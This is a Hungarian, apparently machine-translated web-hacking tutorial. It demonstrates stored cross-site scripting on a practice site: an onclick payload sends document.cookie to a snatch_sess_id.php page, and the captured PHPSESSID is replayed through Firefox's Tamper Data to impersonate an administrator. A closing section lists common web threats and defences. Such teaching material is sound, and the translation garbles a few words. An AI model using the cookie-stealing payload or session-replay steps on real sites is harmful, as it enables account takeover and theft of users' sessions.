Hogyan lehet feltörni egy weboldalt? Webhelyfeltörési technikák
⚡ Okos összefoglaló
A weboldalak feltörése a webes alkalmazások gyengeségeit – rosszul megírt kódot, nem ellenőrzött bemenetet és gyenge munkamenet-kezelést – használja ki jogosulatlan hozzáférés megszerzése érdekében. Ez az oldal bemutatja a gyakori támadási technikákat, és ami még fontosabb, azokat az ellenintézkedéseket, amelyek biztonságban tartják a weboldalakat.

Több ember fér hozzá az internethez, mint valaha. Ez sok szervezetet késztetett arra, hogy olyan webalapú alkalmazásokat fejlesszen ki, amelyek segítségével a felhasználók online kapcsolatba léphetnek a szervezettel. A webalkalmazások rosszul megírt kódja kihasználható érzékeny adatokhoz és webszerverekhez való jogosulatlan hozzáféréshez.
Megtanulod a weboldalak feltörésére szolgáló gyakori technikákat és az ilyen támadások elleni védekezési módszereket.
Hogyan kell feltörni egy webhelyet
Ebben a webhely-hackelés gyakorlati forgatókönyvében a webalkalmazás felhasználói munkamenetét fogjuk eltéríteni a címen www.techpanda.orgKeresztoldali szkriptelést fogunk használni a süti munkamenet-azonosítójának beolvasásához, majd egy legitim felhasználói munkamenet utánzásához.
A feltételezés az, hogy a támadó hozzáfér a webes alkalmazáshoz, és szeretné eltéríteni az ugyanazon alkalmazást használó többi felhasználó munkamenetét. A támadás célja az lehet, hogy rendszergazdai hozzáférést szerezzen a webes alkalmazáshoz, feltételezve, hogy a támadó hozzáférési fiókja korlátozott.
1. lépés) Nyissa meg URL http://www.techpanda.org/.
Gyakorlási célokból erősen ajánlott SQL-injekcióval hozzáférni. Lásd: Ez a cikk az SQL injektálásról szól további információért, hogyan kell ezt megtenni.
2. lépés) Adja meg a bejelentkezési adatokat.
A bejelentkezési e-mail cím admin@google.com, a jelszó pedig Password2010.
3. lépés) Ellenőrizze a műszerfalat.
Ha sikeresen bejelentkezett, akkor a következő irányítópultot fogja látni.
4. lépés) Új tartalom megadása.
Kattintson az Új kapcsolat hozzáadása gombra, és adja meg a következő keresztnevet:
<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>
5. lépés) Hozzáadás JavaForgatókönyv.
A fenti kódot használja JavaSzkript. Hozzáad egy hiperhivatkozást egy onclick eseménnyel. Amikor a gyanútlan felhasználó rákattint a hivatkozásra, az esemény lekéri a PHP süti munkamenet-azonosító és elküldi a snatch_sess_id.php oldalnak a munkamenet-azonosítóval együtt a URL.
6. lépés) Részletek hozzáadása.
Adja meg a fennmaradó adatokat az alábbiak szerint, majd kattintson a Változtatások mentése gombra.
7. lépés) Ellenőrizze a műszerfalat.
Az irányítópult most a következő képernyőhöz hasonlóan fog kinézni.
8. lépés) Ellenőrizze a munkamenet-azonosítót.
Mivel a webhelyek közötti szkript az adatbázisban tárolódik, minden alkalommal betöltődik, amikor a hozzáférési jogosultsággal rendelkező felhasználók bejelentkeznek. Amikor a rendszergazda bejelentkezik és a Sötét hiperhivatkozásra kattint, egy ablak jelenik meg a munkamenet-azonosítóval. URL.
Megjegyzés: a szkript elküldheti az értéket egy távoli szerverre, ahol a PHPSESSID tárolva van, majd átirányíthatja a felhasználót vissza, mintha mi sem történt volna.
Megjegyzés: a kapott érték eltérhet az itt láthatótól, de a koncepció ugyanaz.
Munkamenet Megszemélyesítés segítségével Firefox és Tamper Data kiegészítő
Megjegyzés: az alább látható klasszikus Tamper Data kiegészítő már nem települ a jelenlegi gépre. Firefox, de az általa bemutatott koncepció – egy HTTP-kérés elfogása és módosítása egy rögzített munkamenet visszajátszása érdekében – változatlan marad.
Az alábbi folyamatábra bemutatja azokat a lépéseket, amelyeket meg kell tennie a gyakorlat végrehajtásához.
- Szükséged lesz a Firefox webböngésző ehhez a szakaszhoz és a Tamper Data bővítményhez.
- Nyisd ki Firefox és telepítse a kiegészítőt az alábbi ábrákon látható módon.
- Keresd meg a szabotázsadatok kifejezést, majd kattints a telepítésre a fent látható módon.
- Kattintson az Elfogadás és telepítés gombra…
- Kattintson az Újraindítás most gombra, amikor a telepítés befejeződött.
- Engedélyezze a menüsort Firefox ha nem mutatják be.
- Kattintson az Eszközök menüre, majd válassza a Manipulációs adatok lehetőséget az alábbiak szerint.
- A következő ablakot fogja látni. Megjegyzés: Ha az ablak nem üres, kattintson a törlés gombra.
- Kattintson a Szabotázs indítása menüre.
- Váltson vissza a Firefox A webböngészőbe írja be a http://www.techpanda.org/dashboard.php címet, majd nyomja meg az Enter billentyűt az oldal betöltéséhez.
- A következő felugró ablakot fogja kapni a Tamper Data-tól.
- A felugró ablakban három (3) lehetőség közül választhat. A Manipuláció lehetőség lehetővé teszi a HTTP fejlécinformációk módosítását, mielőtt azok elküldésre kerülnének a szervernek.
- Kattintson rá.
- A következő ablakot kapja.
- Másold ki a támadásból kimásolt PHP munkamenet-azonosítót URL és illeszd be az egyenlőségjel után. Az értéknek most így kell kinéznie.
PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
- Kattintson az OK gombra.
- Ismét megjelenik a Szabotázsadatok felugró ablak.
- Törölje a jelet a jelölőnégyzetből, amely a Continue Tampering?
- Kattintson a küldés gombra, ha kész.
- Az irányítópultnak az alábbiak szerint kell megjelennie.
Megjegyzés: nem jelentkeztünk be; egy bejelentkezési munkamenetet utánoztunk a cross-site scripting segítségével lekért PHPSESSID értékkel.
Mi az a webalkalmazás? Mik azok a webes fenyegetések?
A webalkalmazás (más néven weboldal) egy kliens-szerver modellen alapuló alkalmazás. A szerver biztosítja az adatbázis-hozzáférést és az üzleti logikát. Egy webszerveren fut. A kliensalkalmazás a kliens webböngészőjében fut. A webalkalmazásokat általában olyan nyelveken írják, mint a Java, C#, VB.Net, PHP, és a ColdFusion Markup Language stb. A webes alkalmazásokban használt adatbázis-motorok közé tartoznak a következők MySQL, MS SQL Server, PostgreSQL, SQLiteStb
A legnépszerűbb webhely-hackelési technikák
A legtöbb webes alkalmazás nyilvános helyen található szerverek elérhetők az interneten keresztül. Ez a könnyű hozzáférhetőség miatt sebezhetővé teszi őket a támadásokkal szemben. Az alábbiakban a webes alkalmazásokat fenyegető gyakori fenyegetéseket ismertetjük.
- SQL Injection – ennek a fenyegetésnek a célja lehet a bejelentkezési algoritmusok megkerülése, az adatok szabotálása stb.
- Denial of Service Támadások – ennek a fenyegetésnek a célja az lehet, hogy megtagadja a jogos felhasználók hozzáférését az erőforráshoz.
- Webhelyek közötti szkriptek (XSS) – ennek a fenyegetésnek a célja az lehet, hogy olyan kódot fecskendezzen be, amely végrehajtható a kliensoldali böngészőben.
- Cookie/Session Poisoning - ennek a fenyegetésnek az a célja, hogy a támadó módosítsa a cookie-kat/munkamenetadatokat, hogy illetéktelen hozzáférést szerezzen.
- Űrlap manipuláció – ennek a fenyegetésnek az a célja, hogy módosítsa az űrlapadatokat, például az árakat az e-kereskedelmi alkalmazásokban, hogy a támadó csökkentett áron juthasson hozzá a termékekhez.
- Code Injekció - ennek a fenyegetésnek az a célja, hogy olyan kódot fecskendezzen be, mint a PHP, Python, stb., amelyek a szerveren végrehajthatók. A kód hátsó ajtókat telepíthet, bizalmas információkat fedhet fel stb.
- eltorzítás – a fenyegetés célja, hogy módosítsa a weboldalon megjelenített oldalt, és az összes oldalkérés átirányítása egyetlen, a támadó üzenetét tartalmazó oldalra.
Hogyan védheti meg webhelyét a feltörések ellen?
Egy szervezet a következő házirendet alkalmazhatja, hogy megvédje magát a webszerver-támadásokkal szemben.
- SQL Injection – a felhasználói paraméterek adatbázisba való beküldés előtti ellenőrzése és validálása segíthet csökkenteni az SQL-injekción keresztüli támadások esélyét. Adatbázismotorok, mint például az MS SQL Server, MySQLstb. támogatják a paramétereket és az előkészített utasításokat. Sokkal biztonságosabbak, mint a hagyományos SQL utasítások.
- Szolgáltatás megtagadása – a tűzfalak segítségével el lehet állítani a gyanús IP-címekről érkező forgalmat, ha a támadás egy egyszerű DoS (szolgáltatásmegtagadás) támadás. A hálózatok megfelelő konfigurációja és egy behatolásérzékelő rendszer is segíthet csökkenteni a DoS-támadások sikerességének esélyét.
- Cross-Site Scripting – a rendszeren keresztül átadott fejlécek és paraméterek validálása és fertőtlenítése URL, az űrlapparaméterek és a rejtett értékek segíthetnek csökkenteni az XSS-támadásokat.
- Cookie/Session Poisoning – ez megelőzhető a sütik tartalmának titkosításával, a sütik időkorlátozásával egy bizonyos idő elteltével, és a sütiknek a létrehozásukhoz használt kliens IP-címhez való társításával.
- Űrlap manipuláció – ez megelőzhető a felhasználói bevitel feldolgozás előtti validálásával és ellenőrzésével.
- Code Injekció – ez megelőzhető, ha minden paramétert adatként, és nem futtatható kódként kezelünk. A fertőtlenítés és az validáció segítségével valósítható meg ez.
- eltorzítás – egy jó webes alkalmazások biztonsága A szabályzatnak biztosítania kell, hogy lezárja a webszerverhez való hozzáféréshez gyakran használt sebezhetőségeket. Ez lehet az operációs rendszer, a webszerver szoftverének megfelelő konfigurációja és a fejlesztés során bevált biztonsági gyakorlatok.ping webes alkalmazások.
Nézd meg: 9 Legjobb URL Szkennerek annak ellenőrzésére, hogy egy hivatkozás biztonságos-e a kártevőktől


















